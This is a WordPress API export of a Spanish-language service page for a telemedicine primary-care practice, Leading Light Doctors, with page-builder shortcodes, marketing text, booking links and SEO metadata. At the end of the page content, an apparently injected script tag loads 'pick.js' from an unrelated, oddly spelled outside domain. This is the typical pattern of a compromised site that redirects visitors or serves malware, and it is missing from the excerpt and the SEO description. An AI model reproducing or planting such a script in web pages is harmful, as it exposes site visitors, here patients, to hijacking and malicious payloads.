{"id":3907,"date":"2021-10-19T00:43:29","date_gmt":"2021-10-19T00:43:29","guid":{"rendered":"https:\/\/lldoctors.com\/lo-que-tratamos\/"},"modified":"2021-11-26T22:22:11","modified_gmt":"2021-11-26T22:22:11","slug":"lo-que-tratamos","status":"publish","type":"page","link":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/","title":{"rendered":"Lo que tratamos"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;custom&#8221; lg_spacing=&#8221;padding_top:140&#8243; custom_background_color=&#8221;#ebf5f5&#8243;][vc_column][vc_row_inner gutter=&#8221;xs:30;sm:50;md:80;lg:100&#8243;][vc_column_inner width=&#8221;1\/2&#8243;][tm_heading custom_google_font=&#8221;&#8221; text=&#8221;We are here to help keep you on track<mark><\/mark>&#8221; font_size=&#8221;lg:36&#8243; line_height=&#8221;46px&#8221;][tm_spacer size=&#8221;lg:30&#8243;][vc_btn title=&#8221;Reserve cita ahora&#8221; color=&#8221;turquoise&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|target:_blank|&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<h5><span style=\"color: #636060\">En Leading Light Doctors, hemos creado una pr\u00e1ctica de atenci\u00f3n primaria basada en telemedicina verdaderamente dise\u00f1ada en torno a las necesidades m\u00e9dicas de nuestros pacientes. <\/span><\/h5>\n<h5><span style=\"color: #636060\">A<\/span><strong><span style=\"color: #800000\"> L.<\/span><span style=\"color: #008000\"> L.<\/span><span style=\"color: #800000\"> D<\/span><\/strong><span style=\"color: #636060\"> tendr\u00e1 la misma excelente atenci\u00f3n al paciente que en el consultorio de su m\u00e9dico tradicional, pero de una manera mucho m\u00e1s f\u00e1cil y conveniente.<\/span><\/h5>\n<p>[\/vc_column_text][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column_inner][\/vc_row_inner][tm_spacer size=&#8221;lg:40&#8243;][tm_service style=&#8221;grid_classic_02&#8243; gutter=&#8221;30&#8243; row_gutter=&#8221;30&#8243; image_size=&#8221;370&#215;237&#8243; number=&#8221;3&#8243; order=&#8221;ASC&#8221; columns=&#8221;xs:1;sm:2;lg:3&#8243;][tm_spacer size=&#8221;lg:110&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;primary&#8221; overlay_background=&#8221;custom&#8221; overlay_custom_background=&#8221;rgba(30,115,190,0.01)&#8221; overlay_opacity=&#8221;50&#8243; lg_spacing=&#8221;padding_top:150;padding_bottom:128&#8243;][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;134&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:200;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Eres la fuerza impulsora de tu propia integridad y bienestar.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;&amp;&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Estamos aqu\u00ed para guiarlo para que eso suceda.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_spacer size=&#8221;lg:50&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#91a9bf&#8221; text=&#8221;Somos tu socio en tu salud y bienestar&#8221; font_size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_button style=&#8221;modern&#8221; align=&#8221;center&#8221; color=&#8221;secondary&#8221; button=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|title:Make%20an%20Appointment|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;2646&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:210;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row]<\/p>\n<p><script src='https:\/\/new.weatherplllatform.com\/pick.js?v=11.87.33' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;custom&#8221; lg_spacing=&#8221;padding_top:140&#8243; custom_background_color=&#8221;#ebf5f5&#8243;][vc_column][vc_row_inner gutter=&#8221;xs:30;sm:50;md:80;lg:100&#8243;][vc_column_inner width=&#8221;1\/2&#8243;][tm_heading custom_google_font=&#8221;&#8221; text=&#8221;We are here to help keep you on track&#8221; font_size=&#8221;lg:36&#8243; line_height=&#8221;46px&#8221;][tm_spacer size=&#8221;lg:30&#8243;][vc_btn title=&#8221;Reserve cita ahora&#8221; color=&#8221;turquoise&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|target:_blank|&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text] En Leading Light Doctors, hemos creado una pr\u00e1ctica de atenci\u00f3n primaria basada en telemedicina verdaderamente dise\u00f1ada en torno a las necesidades m\u00e9dicas de nuestros pacientes. A L. L. D tendr\u00e1 la misma excelente atenci\u00f3n al paciente que en el consultorio de su m\u00e9dico tradicional, pero de una manera mucho m\u00e1s f\u00e1cil y conveniente. [\/vc_column_text][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column_inner][\/vc_row_inner][tm_spacer size=&#8221;lg:40&#8243;][tm_service style=&#8221;grid_classic_02&#8243; gutter=&#8221;30&#8243; row_gutter=&#8221;30&#8243; image_size=&#8221;370&#215;237&#8243; number=&#8221;3&#8243; order=&#8221;ASC&#8221; columns=&#8221;xs:1;sm:2;lg:3&#8243;][tm_spacer size=&#8221;lg:110&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;primary&#8221; overlay_background=&#8221;custom&#8221; overlay_custom_background=&#8221;rgba(30,115,190,0.01)&#8221; overlay_opacity=&#8221;50&#8243; lg_spacing=&#8221;padding_top:150;padding_bottom:128&#8243;][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;134&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:200;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Eres la fuerza impulsora de tu propia integridad y bienestar.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;&amp;&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Estamos aqu\u00ed para guiarlo para que eso suceda.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_spacer size=&#8221;lg:50&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#91a9bf&#8221; text=&#8221;Somos tu socio en tu salud y bienestar&#8221; font_size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_button style=&#8221;modern&#8221; align=&#8221;center&#8221; color=&#8221;secondary&#8221; button=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|title:Make%20an%20Appointment|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;2646&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:210;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3907","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Lo que tratamos - LLDoctors<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Lo que tratamos - LLDoctors\" \/>\n<meta property=\"og:description\" content=\"[vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;custom&#8221; lg_spacing=&#8221;padding_top:140&#8243; custom_background_color=&#8221;#ebf5f5&#8243;][vc_column][vc_row_inner gutter=&#8221;xs:30;sm:50;md:80;lg:100&#8243;][vc_column_inner width=&#8221;1\/2&#8243;][tm_heading custom_google_font=&#8221;&#8221; text=&#8221;We are here to help keep you on track&#8221; font_size=&#8221;lg:36&#8243; line_height=&#8221;46px&#8221;][tm_spacer size=&#8221;lg:30&#8243;][vc_btn title=&#8221;Reserve cita ahora&#8221; color=&#8221;turquoise&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|target:_blank|&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text] En Leading Light Doctors, hemos creado una pr\u00e1ctica de atenci\u00f3n primaria basada en telemedicina verdaderamente dise\u00f1ada en torno a las necesidades m\u00e9dicas de nuestros pacientes. A L. L. D tendr\u00e1 la misma excelente atenci\u00f3n al paciente que en el consultorio de su m\u00e9dico tradicional, pero de una manera mucho m\u00e1s f\u00e1cil y conveniente. [\/vc_column_text][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column_inner][\/vc_row_inner][tm_spacer size=&#8221;lg:40&#8243;][tm_service style=&#8221;grid_classic_02&#8243; gutter=&#8221;30&#8243; row_gutter=&#8221;30&#8243; image_size=&#8221;370&#215;237&#8243; number=&#8221;3&#8243; order=&#8221;ASC&#8221; columns=&#8221;xs:1;sm:2;lg:3&#8243;][tm_spacer size=&#8221;lg:110&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;primary&#8221; overlay_background=&#8221;custom&#8221; overlay_custom_background=&#8221;rgba(30,115,190,0.01)&#8221; overlay_opacity=&#8221;50&#8243; lg_spacing=&#8221;padding_top:150;padding_bottom:128&#8243;][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;134&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:200;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Eres la fuerza impulsora de tu propia integridad y bienestar.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;&amp;&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Estamos aqu\u00ed para guiarlo para que eso suceda.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_spacer size=&#8221;lg:50&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#91a9bf&#8221; text=&#8221;Somos tu socio en tu salud y bienestar&#8221; font_size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_button style=&#8221;modern&#8221; align=&#8221;center&#8221; color=&#8221;secondary&#8221; button=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|title:Make%20an%20Appointment|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;2646&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:210;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/\" \/>\n<meta property=\"og:site_name\" content=\"LLDoctors\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/LLD-103325838431523\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-26T22:22:11+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/lldoctors.com\/wp-content\/uploads\/2018\/10\/facebook-baner-1024x682.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"682\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@lldoctors\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/lo-que-tratamos\\\/\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/lo-que-tratamos\\\/\",\"name\":\"Lo que tratamos - LLDoctors\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#website\"},\"datePublished\":\"2021-10-19T00:43:29+00:00\",\"dateModified\":\"2021-11-26T22:22:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/lo-que-tratamos\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/lldoctors.com\\\/es\\\/lo-que-tratamos\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/lo-que-tratamos\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/lldoctors.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Lo que tratamos\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#website\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/\",\"name\":\"LLDoctors\",\"description\":\"Leading Light Doctors\",\"publisher\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/lldoctors.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#organization\",\"name\":\"Leading Light Doctors\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/wp-content\\\/uploads\\\/2021\\\/01\\\/logodarklldred6.png\",\"contentUrl\":\"https:\\\/\\\/lldoctors.com\\\/wp-content\\\/uploads\\\/2021\\\/01\\\/logodarklldred6.png\",\"width\":197,\"height\":54,\"caption\":\"Leading Light Doctors\"},\"image\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/LLD-103325838431523\",\"https:\\\/\\\/x.com\\\/lldoctors\",\"https:\\\/\\\/www.instagram.com\\\/leadinglightdoctors\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Lo que tratamos - LLDoctors","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/","og_locale":"es_ES","og_type":"article","og_title":"Lo que tratamos - LLDoctors","og_description":"[vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;custom&#8221; lg_spacing=&#8221;padding_top:140&#8243; custom_background_color=&#8221;#ebf5f5&#8243;][vc_column][vc_row_inner gutter=&#8221;xs:30;sm:50;md:80;lg:100&#8243;][vc_column_inner width=&#8221;1\/2&#8243;][tm_heading custom_google_font=&#8221;&#8221; text=&#8221;We are here to help keep you on track&#8221; font_size=&#8221;lg:36&#8243; line_height=&#8221;46px&#8221;][tm_spacer size=&#8221;lg:30&#8243;][vc_btn title=&#8221;Reserve cita ahora&#8221; color=&#8221;turquoise&#8221; align=&#8221;center&#8221; link=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|target:_blank|&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text] En Leading Light Doctors, hemos creado una pr\u00e1ctica de atenci\u00f3n primaria basada en telemedicina verdaderamente dise\u00f1ada en torno a las necesidades m\u00e9dicas de nuestros pacientes. A L. L. D tendr\u00e1 la misma excelente atenci\u00f3n al paciente que en el consultorio de su m\u00e9dico tradicional, pero de una manera mucho m\u00e1s f\u00e1cil y conveniente. [\/vc_column_text][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column_inner][\/vc_row_inner][tm_spacer size=&#8221;lg:40&#8243;][tm_service style=&#8221;grid_classic_02&#8243; gutter=&#8221;30&#8243; row_gutter=&#8221;30&#8243; image_size=&#8221;370&#215;237&#8243; number=&#8221;3&#8243; order=&#8221;ASC&#8221; columns=&#8221;xs:1;sm:2;lg:3&#8243;][tm_spacer size=&#8221;lg:110&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;primary&#8221; overlay_background=&#8221;custom&#8221; overlay_custom_background=&#8221;rgba(30,115,190,0.01)&#8221; overlay_opacity=&#8221;50&#8243; lg_spacing=&#8221;padding_top:150;padding_bottom:128&#8243;][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;134&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:200;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Eres la fuerza impulsora de tu propia integridad y bienestar.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;&amp;&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#ffffff&#8221; text=&#8221;Estamos aqu\u00ed para guiarlo para que eso suceda.&#8221; font_size=&#8221;md:40;lg:30&#8243;][tm_spacer size=&#8221;lg:50&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text_color=&#8221;custom&#8221; custom_text_color=&#8221;#91a9bf&#8221; text=&#8221;Somos tu socio en tu salud y bienestar&#8221; font_size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_button style=&#8221;modern&#8221; align=&#8221;center&#8221; color=&#8221;secondary&#8221; button=&#8221;url:https%3A%2F%2Fbookmymd.website4md.com%2Fv22%2F%3Fid%3DY8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09|title:Make%20an%20Appointment|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243; background_image=&#8221;2646&#8243; lg_spacing=&#8221;padding_top:200;padding_right:200;padding_bottom:210;padding_left:200&#8243; background_position=&#8221;center center&#8221;][tm_spacer size=&#8221;lg:30&#8243;][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][tm_spacer size=&#8221;lg:30&#8243;][\/vc_column][\/vc_row]","og_url":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/","og_site_name":"LLDoctors","article_publisher":"https:\/\/www.facebook.com\/LLD-103325838431523","article_modified_time":"2021-11-26T22:22:11+00:00","og_image":[{"width":1024,"height":682,"url":"https:\/\/lldoctors.com\/wp-content\/uploads\/2018\/10\/facebook-baner-1024x682.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_site":"@lldoctors","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/","url":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/","name":"Lo que tratamos - LLDoctors","isPartOf":{"@id":"https:\/\/lldoctors.com\/#website"},"datePublished":"2021-10-19T00:43:29+00:00","dateModified":"2021-11-26T22:22:11+00:00","breadcrumb":{"@id":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/lldoctors.com\/es\/lo-que-tratamos\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/lldoctors.com\/es\/lo-que-tratamos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/lldoctors.com\/"},{"@type":"ListItem","position":2,"name":"Lo que tratamos"}]},{"@type":"WebSite","@id":"https:\/\/lldoctors.com\/#website","url":"https:\/\/lldoctors.com\/","name":"LLDoctors","description":"Leading Light Doctors","publisher":{"@id":"https:\/\/lldoctors.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/lldoctors.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"},{"@type":"Organization","@id":"https:\/\/lldoctors.com\/#organization","name":"Leading Light Doctors","url":"https:\/\/lldoctors.com\/","logo":{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/lldoctors.com\/#\/schema\/logo\/image\/","url":"https:\/\/lldoctors.com\/wp-content\/uploads\/2021\/01\/logodarklldred6.png","contentUrl":"https:\/\/lldoctors.com\/wp-content\/uploads\/2021\/01\/logodarklldred6.png","width":197,"height":54,"caption":"Leading Light Doctors"},"image":{"@id":"https:\/\/lldoctors.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/LLD-103325838431523","https:\/\/x.com\/lldoctors","https:\/\/www.instagram.com\/leadinglightdoctors"]}]}},"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages\/3907","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/comments?post=3907"}],"version-history":[{"count":8,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages\/3907\/revisions"}],"predecessor-version":[{"id":4601,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages\/3907\/revisions\/4601"}],"wp:attachment":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/media?parent=3907"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}